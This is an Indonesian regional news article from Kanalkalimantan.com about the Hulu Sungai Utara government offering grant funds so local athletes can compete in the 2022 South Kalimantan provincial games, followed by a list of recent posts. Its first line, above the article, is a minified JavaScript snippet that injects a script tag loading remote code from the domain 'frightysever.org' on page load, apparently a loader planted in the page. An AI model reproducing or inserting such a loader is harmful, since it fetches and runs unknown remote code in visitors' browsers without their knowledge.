(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Pemkab HSU Beri Opsi Tambahan Dana Hibah ke Atlet Porprov


KANALKALIMANTAN. COM, AMUNTAI – Menjawab persoalan anggaran yang dihadapi Komite Olahraga Nasional Indonesia (KONI) Hulu Sungai Utara (HSU) jelang Porpov (Pekan Olahraga Provinsi) Kalsel ke XI 2022, Pemerintah Kabupaten (Pemkab) HSU memberikan opsi dana hibah agar para atlet dapat berlaga di event terbesar se Kalsel tersebut.

Rencana dana hibah itu diutarakan Pelaksana tugas (Plt) Kepala Badan Pemeriksa Keuangan Daerah (BPKAD) HSU, Joko Sumarsono, didampingi Kepala Disporapar HSU Fajeri Ripani dalam rapat dengar pendapat KONI HSU dengan anggota DPRD HSU, pada Selasa (8/3/2022).

Pertemuan tersebut sendiri dalam rangka pembahasan mengenai dana anggaran para atlet mengikuti Porpov XI Kalsel 2022 di Kabupaten Hulu Sungai Selatan (HSS).

Plt Kepala BPKAD HSU, Joko Sumarsono mengatakan, menanggapi apa yang disampaikan Ketua KONI HSU tentang usulan dana tahun 2022 sebesar 7,5 miliar, akhirnya disepakati kembali 2,8 miliar.

 

Baca juga : Gerayangi Siswi Magang, Honorer di Banjarbaru Terancam Pasal Perlindungan Anak

“Artinya kita memberikan hibah kepada KONI sebesar realisasi yang sudah dilakukan oleh KONI pada tahun sebelumnya, ternyata kita tidak menduga tahun ini ada pelaksanaan Porprov di Hulu Sungai Selatan,” kata Joko.

Menyikapi hal ini, kata Joko, memang harus jadikan bahan pemikiran serta perlu carikan solusinya.

Dengan kemampuan keuangan daerah yang terbatas, perlu cara agar Pemkab HSU bisa mensupport KONI, salah satunya adalah melalui hibah yang didalamnya ketentunya sesuai dengan tahapan dan waktu yang harus dipenuhi.

“Misalnya untuk penganggaran tahun berikutnya itu dokumen perencanaannya sudah disiapkan atau dokumen hibahnya sudah ada setahun sebelumnya,” katanya.

 

Baca juga : Wakil Ketua DPRD Reses ke Dapil Kecamatan Mantangai

Selain itu, Pemkab HSU juga mengupayakan dana hibah saat APBD Perubahan dengan ketentuan dan regulasi terlebih dahulu.
“Yang jelas komitmen pemerintah daerah untuk mendukung olahraga di HSU begitu besar, apalagi cabang olahraga di HSU memiliki prestasi yang dari tahun ke tahun meningkat perlu kita dukung,” tegasnya.

Joko menambahkan pembahasan tidak begitu saja berakhir, karena DPA di Disporapar HSU akan menanggapi pembahasan yang lebih teknis dan lebih intens dari rincian proposal.

“Dari dana hibah yang sudah diberikan pemerintah kepada KONI sebesar Rp 2,8 miliar merupakan pembinaan dan pengembangan untuk menuju prestasi pada Porprov ke XI di HSS,” harapnya.

Sementara itu, Ketua KONI HSU Ahmad Barkati mengatakan, meski terkendala kekurangan dana untuk pembinaan olahraga, pihaknya tetap semangat untuk melaksanakan persiapan atlet jelang Porprov.

Cabang olahraga di Porprov ke XI 2022 sekarang bertambah sebanyak 37 cabang olahraga.

“Kita memikirkan atlet kita yang berprestasi secara nasional untuk mewakili Indonesia. Bagaimana daerah bisa memikirkan atlet berprestasi tersebut, jika para atlet sudah tidak ada lagi mewakili daerah, atlet itu bisa dipekerjakan di instansi pemerintahan karena mereka merupakan aset yang mengharumkan nama daerah,” harapnya. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

11 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

12 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

12 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

12 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

12 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

12 jam ago

This website uses cookies.